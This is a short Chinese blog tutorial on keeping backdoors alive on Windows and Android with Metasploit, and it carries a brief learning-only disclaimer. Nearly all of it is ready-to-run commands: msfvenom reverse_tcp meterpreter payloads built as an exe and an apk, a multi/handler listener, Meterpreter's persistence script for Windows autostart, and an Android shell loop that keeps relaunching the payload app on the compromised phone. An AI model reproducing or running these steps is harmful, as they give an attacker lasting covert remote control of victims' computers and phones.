drimwai的博客

windows/android后门的维持

## 前言:本教程只作为学习用途,切勿用于其他用途。恶意入侵他人终端属于国家明令禁止的违法行为,请务必遵守!!!

 

## 搭建环境:

### kali linux 2019.3

### Metasploit Framework


## windows/android后门维持

### 1. windons后门维持

// 先创建一个后门payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe
// 打开msf控制台,并完成相关设置
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 4444
set ExitonSession false
exploit -j    // 后台运行
// 连接后门成功后,创建可维持后门脚本
run persistence -h    //查看帮助
run persistence -U -i 5 -r <your ip> -p 4444


### 2. Andorid后门维持

// 先创建一个后门payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -o /root/Desktop/androidPayload.apk
// 创建一个维持脚本代码(lifetime.sh)
#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 10
done
// 打开msf控制台,并完成相关设置
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 4444
set ExitonSession false
exploit -j    // 后台运行
// 连接后门成功后,上传后门脚本,并运行
cd /sdcard
upload /root/Desktop/lifetime.sh
shell           // 进入被入侵终端控制台
cd /sdcard
sh lifetime.sh  // 运行维持脚本


## 实现效果展示(如果清晰度不够,请移步bilibili观看哦!)

drimwai的博客
drimwai的博客
使用条款和私隐条款。版权所有,保留一切权利。
Copyright by drimwai Liang (2018-2020). All Right Reserved.